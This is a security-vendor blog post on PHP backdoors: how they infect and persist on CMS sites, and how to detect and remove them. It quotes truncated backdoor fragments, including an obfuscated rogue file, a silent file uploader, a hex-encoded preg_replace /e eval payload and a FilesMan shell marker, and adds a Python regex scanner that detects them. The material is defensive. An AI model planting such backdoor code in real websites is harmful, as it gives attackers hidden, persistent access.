911 Hack Removal

How Do PHP Backdoors Infect Your Website?

Updated on: July 14, 2020

More than 1 lakh websites are hacked every day, and it is believed that once a website is compromised, there is a 40% chance of it getting hacked again. Hackers often leave behind malicious code (PHP backdoors) that lets them regain access to the website. This malware is very difficult to remove: even if you reset your entire admin panel, the code is still found hidden deep inside the website. It is called a “backdoor” because it allows access that bypasses normal authentication. Today, many popular CMSs such as WordPress and Magento run on PHP, a server-side scripting language. Because PHP is used by more than 80% of the websites on the web today, PHP backdoors have become a major hacking threat.

What are PHP Backdoors?

PHP backdoors are malware scripts or programs designed to infect your website secretly and give hackers a way to bypass authentication. Backdoors can be used to retain access to the website, inject malware, scrape data, insert a card skimmer, steal financial data, and so on.

A PHP web shell also lets attackers administer your PHP server remotely: they reach its control panel through a URL on the internet. More complex backdoors can also access the server’s memory directly and exploit your website’s data.

PHP backdoors are designed for persistence. They are made to reappear again and again even after a thorough clean-up of your website, which is why they are so hard to get rid of.

What a PHP Backdoor can do on your website:

The power of a PHP backdoor is vast: it lets hackers do anything from running small commands on your website to exploiting it and redirecting its traffic. These backdoors are designed to escalate privileges and go beyond. Using a PHP backdoor, a hacker can:

  • Access any type of data on your server.
  • Use your server to mine cryptocurrency.
  • Turn your server into a bot that obeys the attacker’s instructions to churn out large amounts of spam.

And many more evils!

Detecting PHP Backdoor on your website:

Not every website owner has deep technical knowledge. As a site owner, there is a high chance that you will not be aware of backdoors or any other unauthorized code on your website until it starts showing symptoms.

Therefore, website owners reach out to companies like Astra who help track down these backdoors and get rid of them. This malicious code is difficult to find because it is often obfuscated, which makes it even harder to discern.

Moreover, not all backdoors targeting a website look alike. Hence, you cannot rest after finding one backdoor; it just means you need to dig deeper. There are many ways a PHP backdoor can hide on your website. However, a few common security issues that allow this infection are as follows:

  • Weak or default passwords.
  • Unrestricted PHP file upload.
  • Poor coding of the PHP site that allows unvalidated input.
  • An outdated PHP version.
  • Improper PHP configuration.
  • Weak file permissions on sensitive files.
  • Improper error reporting and disclosure of code.

Removing PHP Backdoors from your website

The first step towards removing these backdoors is to locate the malware. Removing the backdoor also requires finding the initial code that allowed the unauthorized access and removing that code. Hence, understanding the code that operates your site is very important. Below is a list of files and code that can be responsible for PHP backdoors.

Rogue File Backdoors

In many cases, backdoors are found as rogue files. These files are not part of the core plugin, theme, or content management system, but they have names that look similar to genuine core files, so they can easily pass for them. Code in a rogue file might start like this:

$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<=DqV@&(BjX'~|ge%p+oMJv^);\"k9";$GLOBALS['ofmhl60'] = ${$t43[20].$t43

Backdoor Plugins and Themes

Plugins and themes are among the most used features regardless of the CMS you work with. Malicious plugin files are only visible in the file system, through your file manager or FTP. Hackers introduce PHP backdoors into many commonly used plugins. They often go by the following names:

  • WordPress Support
  • Login Wall
  • WP Zipp
  • WP-Base-SEO

Thus, plugins that seem normal at the time of installation may in fact be the files carrying the backdoor code; the owner, unaware of this, installs these files containing backdoors. One such example is the WordPress Sketch theme, which was for a time a popular malware-laden theme uploaded with numerous backdoor files inside it. The only safe way to avoid such an installation is to uninstall all themes or plugins that you do not recognize.

Core File Backdoor Insertion

The core files of your website can have PHP backdoors inserted into them as well. The malware can be found at the beginning of the file or at the end. But if the hacker really wants to bury it in the core of your site, he will try to insert it in the middle of the code.

Below are some examples of such code:

Codes found at the beginning:

Here is another example.

@ini_set('display_errors','off');@ini_set('log_errors',0);@ini_set('error_log',NULL); error_reporting(0); @ini_set('set_time_limit',0);ignore_user_abort(true);if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {@ini_set('upload_max_filesize','1000000');$size=$_POST['size'];$open_image=$_FILES['img']['name']; $open_image_tmp=$_FILES['img']['tmp_name'];$image_tmp=$size.$open_image; @move_uploaded_file($open_image_tmp,$image_tmp);

Other backdoors are highly obfuscated and may start like this:

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\

Often there will be references to FilesMan somewhere within the backdoor file:

$default_action = "FilesMan";
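The fragments quoted above (the scrambled-alphabet rogue file, the error-silencing uploader, the preg_replace /e call with hex-escaped payload, and the FilesMan reference) can be turned into a simple indicator scan. The following script is an added example, not Astra’s scanner or code from this page; the regexes are my own and the sample file tree is constructed to mimic those shapes, so on a real site the patterns would need tuning.

```python
import re
from typing import Dict, List

# Indicator patterns based on the backdoor fragments shown on this page
# (the regexes themselves are my own and will need tuning on a real site).
SIGNATURES = {
    # preg_replace with the /e modifier evaluates the replacement as PHP code
    "preg_replace_e_modifier": re.compile(
        r"preg_replace\s*\(\s*['\"]([/#~|!@]).*?\1[a-zA-Z]*e[a-zA-Z]*['\"]", re.S),
    # long runs of \xNN escapes hide strings such as eval(gzinflate(...))
    "hex_escaped_string": re.compile(r"(?:\\x[0-9A-Fa-f]{2}){6,}"),
    # FilesMan is the default action of a common web-shell family
    "filesman_shell": re.compile(r"FilesMan"),
    # $GLOBALS['x'] = ${$str[20].$str[...]} builds names from a scrambled alphabet
    "globals_index_scramble": re.compile(r"\$GLOBALS\[[^\]]+\]\s*=\s*\$\{\$\w+\[\d+\]"),
}

def scan_source(src: str) -> List[str]:
    """Return the names of every indicator found in one file's contents."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(src)]
    # Silencing all errors and then moving an uploaded file is the
    # 'silent uploader' shape shown in the core-file example above.
    if "error_reporting(0)" in src and "move_uploaded_file" in src:
        hits.append("silent_uploader")
    return hits

def scan_tree(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a mapping of path -> contents; keep only files with at least one hit."""
    findings = {}
    for path, src in files.items():
        hits = scan_source(src)
        if hits:
            findings[path] = hits
    return findings

# Constructed sample tree (not real malware; the fragments mimic the shapes quoted on the page).
SAMPLE_TREE = {
    "index.php": "<?php require __DIR__ . '/wp-blog-header.php';",
    "wp-admin/includes/media.php": "<?php error_reporting(E_ALL); move_uploaded_file($tmp, $dest);",
    "wp-content/uploads/cache.php": r'<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65");',
    "wp-includes/class-wp-image.php": ("<?php @ini_set('display_errors','off');error_reporting(0);"
        "if(@isset($_POST['size']) and @isset($_FILES['img']['name'])){"
        "@move_uploaded_file($_FILES['img']['tmp_name'],$_POST['size'].$_FILES['img']['name']);}"),
    "wp-content/plugins/wp-zipp/shell.php": '<?php $default_action = "FilesMan";',
    "wp-content/themes/sketch/functions.php": "<?php $t43=\"l/T6:aAcNLn\";$GLOBALS['ofmhl60'] = ${$t43[20].$t43[3]};",
}

if __name__ == "__main__":
    for path, hits in scan_tree(SAMPLE_TREE).items():
        print(f"{path}: {', '.join(hits)}")
```

Note that the legitimate media handler, which calls move_uploaded_file with error reporting left on, produces no hit, while the four planted files are each flagged by the indicator they imitate.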

Let’s fight cyber-crime together

Astra website security

Astra’s machine-learning powered automated malware scanner detects a large number of PHP backdoors and malware with just a click. The Astra firewall, on the other hand, monitors your website 24x7 for malicious traffic and blocks incoming security threats. Choose a plan according to your needs and get secured today!

Jinson Varghese

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor's degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling. You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.